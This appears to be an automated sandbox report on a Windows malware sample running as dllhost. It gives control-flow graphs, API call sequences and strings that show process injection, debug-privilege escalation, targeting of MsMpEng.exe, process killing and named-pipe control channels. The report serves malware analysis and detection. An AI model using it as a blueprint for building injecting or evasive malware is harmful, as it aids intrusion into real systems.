                                                          execution_graph 527 1400036f4 528 140003701 527->528 530 140003721 ConnectNamedPipe 528->530 531 140003716 Sleep 528->531 537 140002300 AllocateAndInitializeSid 528->537 532 14000377f Sleep 530->532 533 140003730 ReadFile 530->533 531->528 535 14000378a DisconnectNamedPipe 532->535 534 140003753 WriteFile 533->534 533->535 534->535 535->530 538 14000241b 537->538 539 14000235d SetEntriesInAclW 537->539 538->528 539->538 540 1400023a1 LocalAlloc 539->540 540->538 541 1400023b5 InitializeSecurityDescriptor 540->541 541->538 542 1400023c5 SetSecurityDescriptorDacl 541->542 542->538 543 1400023dc CreateNamedPipeW 542->543 543->538 544 140003634 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 545 14000368a K32EnumProcesses 544->545 546 1400036e7 Sleep 545->546 547 14000369f 545->547 546->545 548 1400036d8 547->548 550 140003190 547->550 548->546 551 1400031a1 550->551 552 1400031c9 550->552 556 140001868 OpenProcess 551->556 552->547 555 140001868 31 API calls 555->552 557 140001cd1 556->557 558 1400018b0 IsWow64Process 556->558 557->555 559 1400018c7 CloseHandle 558->559 559->557 561 1400018ed 559->561 561->557 562 14000192f OpenProcess 561->562 562->557 563 14000194b OpenProcess 562->563 564 140001a04 NtQueryInformationProcess 563->564 565 14000196a K32GetModuleFileNameExW 563->565 566 140001cc8 CloseHandle 564->566 567 140001a29 564->567 568 1400019b3 CloseHandle 565->568 569 140001983 PathFindFileNameW lstrlenW 565->569 566->557 567->566 571 140001a33 OpenProcessToken 567->571 568->564 570 1400019c1 568->570 569->568 572 1400019a0 StrCpyW 569->572 570->564 573 1400019e0 StrCmpIW 570->573 571->566 574 140001a51 GetTokenInformation 571->574 572->568 573->566 573->570 575 140001af4 574->575 576 140001a79 GetLastError 574->576 578 140001afb CloseHandle 575->578 576->575 577 140001a84 LocalAlloc 576->577 577->575 579 140001a9a GetTokenInformation 577->579 578->566 583 140001b0f 578->583 580 140001ae2 579->580 
581 140001ac2 GetSidSubAuthorityCount GetSidSubAuthority 579->581 582 140001ae9 LocalFree 580->582 581->582 582->578 583->566 584 140001b9f StrStrA 583->584 585 140001bc8 583->585 584->583 586 140001bcd 584->586 585->566 586->566 587 140001bf8 VirtualAllocEx 586->587 587->566 588 140001c27 WriteProcessMemory 587->588 588->566 589 140001c46 588->589 597 140002bfc 589->597 591 140001c66 591->566 592 140001c74 WaitForSingleObject 591->592 593 140001c83 GetExitCodeThread 592->593 594 140001cbd CloseHandle 592->594 595 140001ca2 VirtualFreeEx 593->595 596 140001c99 593->596 594->566 595->594 596->595 600 1400020cc GetModuleHandleA 597->600 601 1400020f5 600->601 602 1400020ec GetProcAddress 600->602 602->601 603 140002d38 606 140002d4c 603->606 651 140002a0c 606->651 609 140002a0c 14 API calls 610 140002d74 GetCurrentProcessId OpenProcess 609->610 611 140002d94 OpenProcessToken 610->611 612 140002e06 RegOpenKeyExW 610->612 613 140002da8 LookupPrivilegeValueW 611->613 614 140002dfd CloseHandle 611->614 615 140002e37 RegQueryValueExW 612->615 616 140002d41 ExitProcess 612->616 613->614 617 140002dbf AdjustTokenPrivileges 613->617 614->612 615->616 618 140002e67 RegQueryValueExW 615->618 617->614 619 140002df7 GetLastError 617->619 618->616 620 140002e97 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc RegQueryValueExW 618->620 619->614 620->616 621 140002f09 RegQueryValueExW 620->621 621->616 622 140002f39 RegCloseKey GetCurrentProcessId 621->622 665 14000200c GetProcessHeap HeapAlloc 622->665 624 140002f50 RegCreateKeyExW 625 14000304a CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 624->625 626 140002f8d ConvertStringSecurityDescriptorToSecurityDescriptorW 624->626 627 14000151c 50 API calls 625->627 628 140002fb5 RegSetKeySecurity LocalFree 626->628 629 140002fcf RegCreateKeyExW 626->629 632 1400030d4 627->632 628->629 630 140003009 GetCurrentProcessId RegSetValueExW RegCloseKey 629->630 631 140003040 RegCloseKey 629->631 630->631 631->625 633 
140003112 632->633 634 1400030e0 ShellExecuteW 632->634 635 14000148c 6 API calls 633->635 634->633 634->634 636 14000311a 635->636 637 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 636->637 638 140003123 637->638 639 14000148c 6 API calls 638->639 640 14000312c 639->640 641 14000148c 6 API calls 640->641 642 140003135 641->642 643 14000148c 6 API calls 642->643 644 14000313e 643->644 645 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 644->645 646 140003147 645->646 647 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 646->647 648 140003150 647->648 649 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 648->649 650 140003159 GetProcessHeap HeapFree SleepEx 649->650 650->616 652 140002a15 StrCpyW StrCatW GetModuleHandleW 651->652 653 140002bdf 651->653 652->653 654 140002a66 GetCurrentProcess K32GetModuleInformation 652->654 653->609 655 140002bd6 FreeLibrary 654->655 656 140002a96 CreateFileW 654->656 655->653 656->655 657 140002acb CreateFileMappingW 656->657 658 140002af4 MapViewOfFile 657->658 659 140002bcd CloseHandle 657->659 660 140002bc4 CloseHandle 658->660 661 140002b17 658->661 659->655 660->659 661->660 662 140002b30 lstrcmpiA 661->662 664 140002b6e 661->664 662->661 663 140002b70 VirtualProtect VirtualProtect 662->663 663->660 664->660 671 140001cf0 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 665->671 667 1400020a5 GetProcessHeap HeapFree 668 140002050 668->667 669 140002071 OpenProcess 668->669 669->668 670 140002087 TerminateProcess CloseHandle 669->670 670->668 672 140001e58 GetProcessHeap HeapFree GetProcessHeap RtlFreeHeap 671->672 676 140001d7d 671->676 672->668 673 140001d92 OpenProcess 674 140001daf K32EnumProcessModulesEx 673->674 673->676 675 140001e43 CloseHandle 674->675 674->676 675->676 676->672 676->673 676->675 677 140001de9 ReadProcessMemory 676->677 678 140001e0b 677->678 678->675 678->676 678->677 679 140002cb0 681 140002cbd 679->681 680 140002300 6 API calls 680->681 
681->680 682 140002cd2 Sleep 681->682 683 140002cdd ConnectNamedPipe 681->683 682->681 684 140002d21 Sleep 683->684 685 140002cec ReadFile 683->685 686 140002d2c DisconnectNamedPipe 684->686 685->686 687 140002d0f 685->687 686->683 687->686 689 1400031d0 687->689 690 140003413 689->690 691 1400031f7 689->691 692 140003619 690->692 693 14000341f 690->693 694 140003355 ReadFile 691->694 695 1400031fd 691->695 700 140001f7c 22 API calls 692->700 696 1400035c9 693->696 697 14000342b 693->697 698 140003330 694->698 699 14000337f 694->699 701 140003209 695->701 702 14000334c ExitProcess 695->702 703 1400020fc ReadFile 696->703 704 140003434 697->704 705 140003515 697->705 698->687 699->698 706 14000338c GetProcessHeap HeapAlloc 699->706 700->698 701->698 712 1400032c2 ReadFile 701->712 713 140003227 701->713 707 1400035d8 703->707 708 1400034e4 704->708 709 140003440 704->709 777 1400020fc 705->777 710 140001cf0 13 API calls 706->710 707->698 719 1400020fc ReadFile 707->719 774 140002c5c 708->774 709->698 715 14000344c RegOpenKeyExW 709->715 732 1400033c5 710->732 712->698 723 1400032ec 712->723 713->698 717 140003230 GetProcessHeap HeapAlloc K32EnumProcesses 713->717 720 1400034b5 715->720 721 140003479 RegDeleteValueW RegDeleteValueW RegDeleteValueW 715->721 717->698 740 14000326e 717->740 726 1400035eb 719->726 761 14000217c SysAllocString SysAllocString CoInitializeEx 720->761 721->720 722 1400033fa GetProcessHeap HeapFree 722->698 723->698 733 140001868 31 API calls 723->733 724 14000352c ReadFile 724->698 728 140003554 724->728 726->698 730 1400035ef ShellExecuteW 726->730 728->698 734 140003561 GetProcessHeap HeapAlloc ReadFile 728->734 730->698 731 1400034c1 735 14000217c 9 API calls 731->735 732->722 736 1400033f5 732->736 737 1400033f3 732->737 738 140003312 733->738 734->722 739 1400035a5 734->739 741 1400034cd 735->741 753 140001eec 736->753 737->722 743 140001868 31 API calls 738->743 739->722 781 140002434 739->781 740->698 744 1400032bd 740->744 746 
140001868 31 API calls 740->746 769 140001f7c GetProcessHeap HeapAlloc 741->769 743->744 744->698 746->740 754 140001f65 753->754 755 140001f0b OpenProcess 753->755 754->722 755->754 756 140001f23 755->756 757 140002bfc 2 API calls 756->757 758 140001f43 757->758 759 140001f5c CloseHandle 758->759 760 140001f51 CloseHandle 758->760 759->754 760->759 762 1400022d8 SysFreeString SysFreeString 761->762 763 1400021bd CoInitializeSecurity 761->763 762->731 764 140002205 CoCreateInstance 763->764 765 1400021f9 763->765 766 1400022d2 CoUninitialize 764->766 767 140002234 VariantInit 764->767 765->764 765->766 766->762 768 14000228a 767->768 768->766 770 140001cf0 13 API calls 769->770 771 140001fba 770->771 772 140001fe8 GetProcessHeap HeapFree 771->772 773 140001eec 5 API calls 771->773 773->771 775 1400020cc 2 API calls 774->775 776 140002c71 775->776 778 140002120 ReadFile 777->778 779 140002143 778->779 780 14000215d 778->780 779->778 779->780 780->698 780->724 782 14000246f 781->782 806 140002726 781->806 784 1400020cc 2 API calls 782->784 805 1400024ae 782->805 782->806 783 1400024d7 CreateProcessW 783->805 784->805 785 1400028e1 OpenProcess 786 1400028f1 TerminateProcess 785->786 785->805 786->805 787 1400020cc GetModuleHandleA GetProcAddress 787->805 788 140002566 VirtualAllocEx 790 140002595 WriteProcessMemory 788->790 788->805 789 14000273f VirtualAllocEx 791 14000276d WriteProcessMemory 789->791 789->805 792 1400025b7 VirtualProtectEx 790->792 790->805 793 14000278f VirtualProtectEx 791->793 791->805 792->805 793->805 794 140002858 VirtualAlloc 798 140002879 Wow64GetThreadContext 794->798 794->805 795 140002682 VirtualAlloc 797 1400026a7 GetThreadContext 795->797 795->805 796 1400027d0 WriteProcessMemory 796->805 800 1400026c4 WriteProcessMemory 797->800 797->805 801 140002891 WriteProcessMemory 798->801 798->805 799 1400025f9 WriteProcessMemory 799->805 802 1400026ef SetThreadContext 800->802 800->805 803 1400028b6 Wow64SetThreadContext 801->803 801->805 804 
140002712 ResumeThread 802->804 802->805 803->805 804->805 804->806 805->783 805->785 805->787 805->788 805->789 805->794 805->795 805->796 805->799 805->806 807 140002643 VirtualProtectEx 805->807 808 14000281a VirtualProtectEx 805->808 806->722 807->805 808->805

                                                          Callgraph

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2183396779.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000008.00000002.2183360407.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2183459805.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2183564088.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: Process$Heap$Create$CloseValue$CurrentHandleQuery$AllocFileFreeOpenSecurityThread$DescriptorModuleProtectTokenVirtual$AdjustConvertErrorExecuteInformationLastLibraryLocalLookupMappingPrivilegePrivilegesShellSleepStringViewlstrcmpi
                                                          • String ID: $nya-dll32$$nya-dll64$?$D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$SOFTWARE$SOFTWARE\$nya-config$SeDebugPrivilege$kernel32.dll$ntdll.dll$open$pid$svc64
                                                          • API String ID: 3658652915-3222643892
                                                          • Opcode ID: 1fbe09dec1d199788ba5218dd301b0589b924fd5f4b28719ba773b516d3b2e5d
                                                          • Instruction ID: 4f21af1d6324345a54d8493184232a85d4bbe7b60dd5b863780ff56615b54280
                                                          • Opcode Fuzzy Hash: 1fbe09dec1d199788ba5218dd301b0589b924fd5f4b28719ba773b516d3b2e5d
                                                          • Instruction Fuzzy Hash: A5C1F2B2200A4086EB26DF22F8547DA37A5FB8CBD9F414116FB4A43A76DF38C589C744

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 45 140001868-1400018aa OpenProcess 46 140001cd1-140001ced 45->46 47 1400018b0-1400018c5 IsWow64Process 45->47 48 1400018d5 47->48 49 1400018c7-1400018d3 47->49 50 1400018db-1400018e7 CloseHandle 48->50 49->50 50->46 51 1400018ed-1400018f8 50->51 51->46 52 1400018fe-140001913 51->52 53 140001925 52->53 54 140001915-14000191a 52->54 56 140001927-140001929 53->56 54->46 55 140001920-140001923 54->55 55->56 56->46 57 14000192f-140001945 OpenProcess 56->57 57->46 58 14000194b-140001964 OpenProcess 57->58 59 140001a04-140001a23 NtQueryInformationProcess 58->59 60 14000196a-140001981 K32GetModuleFileNameExW 58->60 61 140001cc8-140001ccb CloseHandle 59->61 62 140001a29-140001a2d 59->62 63 1400019b3-1400019bf CloseHandle 60->63 64 140001983-14000199e PathFindFileNameW lstrlenW 60->64 61->46 62->61 66 140001a33-140001a4b OpenProcessToken 62->66 63->59 65 1400019c1-1400019db 63->65 64->63 67 1400019a0-1400019b0 StrCpyW 64->67 68 1400019e0-1400019f2 StrCmpIW 65->68 66->61 69 140001a51-140001a77 GetTokenInformation 66->69 67->63 68->61 70 1400019f8-140001a02 68->70 71 140001af4 69->71 72 140001a79-140001a82 GetLastError 69->72 70->59 70->68 74 140001afb-140001b09 CloseHandle 71->74 72->71 73 140001a84-140001a98 LocalAlloc 72->73 73->71 75 140001a9a-140001ac0 GetTokenInformation 73->75 74->61 76 140001b0f-140001b16 74->76 78 140001ae2 75->78 79 140001ac2-140001ae0 GetSidSubAuthorityCount GetSidSubAuthority 75->79 76->61 77 140001b1c-140001b27 76->77 77->61 80 140001b2d-140001b37 77->80 81 140001ae9-140001af2 LocalFree 78->81 79->81 82 140001b52 80->82 83 140001b39-140001b43 80->83 81->74 85 140001b56-140001b8e call 1400029a4 * 3 82->85 83->61 84 140001b49-140001b50 83->84 84->85 85->61 92 140001b94-140001bb4 call 1400029a4 StrStrA 85->92 95 140001bb6-140001bc6 92->95 96 140001bcd-140001bf2 call 1400029a4 * 2 92->96 95->92 97 140001bc8 95->97 96->61 102 140001bf8-140001c21 VirtualAllocEx 96->102 97->61 
102->61 103 140001c27-140001c40 WriteProcessMemory 102->103 103->61 104 140001c46-140001c68 call 140002bfc 103->104 104->61 107 140001c6a-140001c72 104->107 107->61 108 140001c74-140001c81 WaitForSingleObject 107->108 109 140001c83-140001c97 GetExitCodeThread 108->109 110 140001cbd-140001cc2 CloseHandle 108->110 111 140001ca2-140001cbb VirtualFreeEx 109->111 112 140001c99-140001c9f 109->112 110->61 111->110 112->111
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2183396779.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000008.00000002.2183360407.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2183459805.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2183564088.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileFreeLocalNameVirtual$CodeCountErrorExitFindLastMemoryModuleObjectPathQuerySingleThreadWaitWow64Writelstrlen
                                                          • String ID: @$MSBuild.exe$MsMpEng.exe$ReflectiveDllMain
                                                          • API String ID: 2456419452-2628171563
                                                          • Opcode ID: 2b16a00b8169fba4865d38f395e3f4d07e54227767ca222d3906c7a16431a916
                                                          • Instruction ID: aa2e9c602b366f086df46edbb2d603c4cad306d9795ea9e87325920370297f3c
                                                          • Opcode Fuzzy Hash: 2b16a00b8169fba4865d38f395e3f4d07e54227767ca222d3906c7a16431a916
                                                          • Instruction Fuzzy Hash: 93C14BB1700A8186EB66DF23B8907EA23A5FB89BC4F444125EF4A477A4DF38C985C744

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 113 1400031d0-1400031f1 114 140003413-140003419 113->114 115 1400031f7 113->115 116 140003619 call 140001f7c 114->116 117 14000341f-140003425 114->117 118 140003355-140003379 ReadFile 115->118 119 1400031fd-140003203 115->119 122 14000361e-140003630 116->122 120 1400035c9-1400035dc call 1400020fc 117->120 121 14000342b-14000342e 117->121 118->122 123 14000337f-140003386 118->123 125 140003209-14000320c 119->125 126 14000334c-14000334e ExitProcess 119->126 120->122 143 1400035de-1400035ed call 1400020fc 120->143 128 140003434-14000343a 121->128 129 140003515-140003526 call 1400020fc 121->129 123->122 130 14000338c-1400033c0 GetProcessHeap HeapAlloc call 140001cf0 123->130 131 140003212-140003215 125->131 132 14000333d-140003347 125->132 136 1400034e4-14000350e call 140002c5c call 140002c88 ExitProcess 128->136 137 140003440-140003446 128->137 129->122 155 14000352c-14000354e ReadFile 129->155 145 1400033c5-1400033c7 130->145 133 14000321b-140003221 131->133 134 140003330-140003338 131->134 132->122 140 1400032c2-1400032e6 ReadFile 133->140 141 140003227-14000322a 133->141 134->122 137->122 144 14000344c-140003477 RegOpenKeyExW 137->144 140->122 154 1400032ec-1400032f3 140->154 141->122 147 140003230-140003268 GetProcessHeap HeapAlloc K32EnumProcesses 141->147 143->122 165 1400035ef-140003617 ShellExecuteW 143->165 150 1400034b5-1400034df call 14000217c * 2 call 140001f7c call 1400017a8 call 14000200c 144->150 151 140003479-1400034af RegDeleteValueW * 3 144->151 152 1400033c9-1400033cf 145->152 153 1400033fa-14000340e GetProcessHeap HeapFree 145->153 147->122 156 14000326e-14000327f 147->156 150->122 151->150 152->153 160 1400033d1-1400033e3 152->160 153->122 154->122 161 1400032f9-14000332b call 140001868 * 2 154->161 155->122 162 140003554-14000355b 155->162 156->122 163 140003285-1400032bb call 140001868 * 2 156->163 167 1400033e5-1400033e7 160->167 168 1400033e9-1400033f1 160->168 
161->122 162->122 170 140003561-14000359f GetProcessHeap HeapAlloc ReadFile 162->170 189 1400032bd 163->189 165->122 167->168 173 1400033f5 call 140001eec 167->173 168->160 174 1400033f3 168->174 170->153 176 1400035a5-1400035b1 170->176 173->153 174->153 176->153 181 1400035b7-1400035c4 call 140002434 176->181 181->153 189->122
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2183396779.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000008.00000002.2183360407.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2183459805.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2183564088.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: Process$Heap$Open$File$AllocCloseDeleteHandleInformationTokenValue$AuthorityFreeLocalNameRead$CountEnumErrorExitFindLastModulePathProcessesQueryWow64lstrlen
                                                          • String ID: $nya-dll32$$nya-dll64$$nya-stager$$nya-svc32$$nya-svc64$SOFTWARE$open
                                                          • API String ID: 2078740077-1712970621
                                                          • Opcode ID: f7c68859b52914e3334372da6bae20eccf7175c030ed6d90c0cd16e79758e7fd
                                                          • Instruction ID: c8d4f342e40e6777a9670b8351b23a9f9beb54452381f7607bad1af34793ce04
                                                          • Opcode Fuzzy Hash: f7c68859b52914e3334372da6bae20eccf7175c030ed6d90c0cd16e79758e7fd
                                                          • Instruction Fuzzy Hash: 0FB106F120468196EB7BDF27B8543E922A9F74C7C4F448125BB0A47ABADF39C645C704

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2183396779.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000008.00000002.2183360407.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2183459805.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2183564088.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                          • String ID:
                                                          • API String ID: 4084875642-0
                                                          • Opcode ID: f02ff77e7f4e077cdd12b46490152bc7a80db30c6c4fa853e392340b29967d71
                                                          • Instruction ID: e2e15449054ed3f9ee7818d53de513bd52f9f3644679b514a33cb2e068489f8a
                                                          • Opcode Fuzzy Hash: f02ff77e7f4e077cdd12b46490152bc7a80db30c6c4fa853e392340b29967d71
                                                          • Instruction Fuzzy Hash: 1B5158B2711A808AEB66DF63F8587EA22A1F78DBC4F804025EF595B764DF38C585C700

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2183396779.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000008.00000002.2183360407.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2183459805.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2183564088.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                          • String ID:
                                                          • API String ID: 3197395349-0
                                                          • Opcode ID: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
                                                          • Instruction ID: 08f0d969cdc459eeaae67e0f3491139f795acf93ec6e34b01acc3ed94c40f622
                                                          • Opcode Fuzzy Hash: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
                                                          • Instruction Fuzzy Hash: 173169B2214691CAE761CF25F4807DE77A4F748798F40422AFB4947EA8DB78C259CB44

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2183396779.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000008.00000002.2183360407.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2183459805.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2183564088.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                          • String ID: .text$C:\Windows\System32\
                                                          • API String ID: 2721474350-832442975
                                                          • Opcode ID: c686aa51e377184264062a0a3ec39641cbabcbb6b6338b4f9c9e14a722750aea
                                                          • Instruction ID: 2da0f49b8f504828cf99bd1c35657877bba6dbaefb57c64c0b3462adf03dc19e
                                                          • Opcode Fuzzy Hash: c686aa51e377184264062a0a3ec39641cbabcbb6b6338b4f9c9e14a722750aea
                                                          • Instruction Fuzzy Hash: 59517BB230468086EB62DF16F9587DA73A1FB8CBD5F444625AF4A03BA8DF38C548C704

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2183396779.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000008.00000002.2183360407.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2183459805.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2183564088.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                          • String ID: M$\\.\pipe\$nya-childproc
                                                          • API String ID: 2203880229-802795868
                                                          • Opcode ID: a9b0775309c1033bdde321130d9dbfa8a5fd9d512a1023e9268893db04bfe7f9
                                                          • Instruction ID: 5f21e6060fcfdf5e456d3793ca8ca668dea709d71954cc69c9167fab55033164
                                                          • Opcode Fuzzy Hash: a9b0775309c1033bdde321130d9dbfa8a5fd9d512a1023e9268893db04bfe7f9
                                                          • Instruction Fuzzy Hash: 0E1179F1208A4082E726EB22F8147EA6760E78DBE0F444225FB5A036F5CF7CC548CB00

                                                          Control-flow Graph for 140002cb0-140002d35 (node and edge list omitted): call 140002300, Sleep, ConnectNamedPipe, ReadFile, call 1400031d0, DisconnectNamedPipe, looping back to ConnectNamedPipe
                                                          Similarity
                                                          • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                          • String ID: \\.\pipe\$nya-control
                                                          • API String ID: 2071455217-2728758917
                                                          • Opcode ID: ea5d0e36b259e0d9586660e08200355551478b737e680bb1466d0a5669cd7301
                                                          • Instruction ID: fae886f8300dcbc0ba88151123110c58f904b6dff6578ae57d5354566521a009
                                                          • Opcode Fuzzy Hash: ea5d0e36b259e0d9586660e08200355551478b737e680bb1466d0a5669cd7301
                                                          • Instruction Fuzzy Hash: 6F011AB1214A0482FB16EB23F8547E9A360A79DBE1F154225FB67436F5DF78C888C704

                                                          Control-flow Graph for 140003634-1400036f0 (node and edge list omitted): GetProcessHeap/HeapAlloc (twice), K32EnumProcesses, call 140003190, Sleep, looping back to K32EnumProcesses
                                                          Similarity
                                                          • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                          • String ID:
                                                          • API String ID: 3676546796-0
                                                          • Opcode ID: 81151b99d530d65dfa122e6c8ce9ef601985b82c456e08e1a9a7be0ad97868de
                                                          • Instruction ID: a1b66254d96c7cf11d413aba10b9c6aee428658a90ca8d6027ab0afa1d9e2250
                                                          • Opcode Fuzzy Hash: 81151b99d530d65dfa122e6c8ce9ef601985b82c456e08e1a9a7be0ad97868de
                                                          • Instruction Fuzzy Hash: 2C1160B270065196E716DB17F81475A7AA6F789BC1F558128EF4207B78CF3AD884CB40

                                                          Similarity
                                                          • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                          • String ID:
                                                          • API String ID: 1323846700-0
                                                          • Opcode ID: 9e888eed53e2bb10b5f797a2cff84821bb432324b3c6bbcbdbea6ae691bf0545
                                                          • Instruction ID: 146a1b11f62a0205da1b5a2207c4e551d66db48d886c31f99c97199126aec534
                                                          • Opcode Fuzzy Hash: 9e888eed53e2bb10b5f797a2cff84821bb432324b3c6bbcbdbea6ae691bf0545
                                                          • Instruction Fuzzy Hash: 77114CB1B0564086FB16DF27B84439A66A1AB8DBD4F488028FF0903776EE39C4868704

                                                          Control-flow Graph for 140002d38-140002d43 (node and edge list omitted): call 140002d4c, then ExitProcess
                                                          APIs
                                                            • Part of subcall function 0000000140002D4C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D74
                                                            • Part of subcall function 0000000140002D4C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D84
                                                            • Part of subcall function 0000000140002D4C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D9E
                                                            • Part of subcall function 0000000140002D4C: LookupPrivilegeValueW.ADVAPI32 ref: 0000000140002DB5
                                                            • Part of subcall function 0000000140002D4C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002DED
                                                            • Part of subcall function 0000000140002D4C: GetLastError.KERNEL32 ref: 0000000140002DF7
                                                            • Part of subcall function 0000000140002D4C: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E00
                                                            • Part of subcall function 0000000140002D4C: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E29
                                                            • Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E59
                                                            • Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E89
                                                            • Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E9D
                                                            • Part of subcall function 0000000140002D4C: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EAB
                                                            • Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EBE
                                                            • Part of subcall function 0000000140002D4C: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002ECC
                                                          • ExitProcess.KERNEL32 ref: 0000000140002D43
                                                          Similarity
                                                          • API ID: Process$Heap$OpenValue$AllocQueryToken$AdjustCloseCurrentErrorExitHandleLastLookupPrivilegePrivileges
                                                          • String ID:
                                                          • API String ID: 2472495637-0
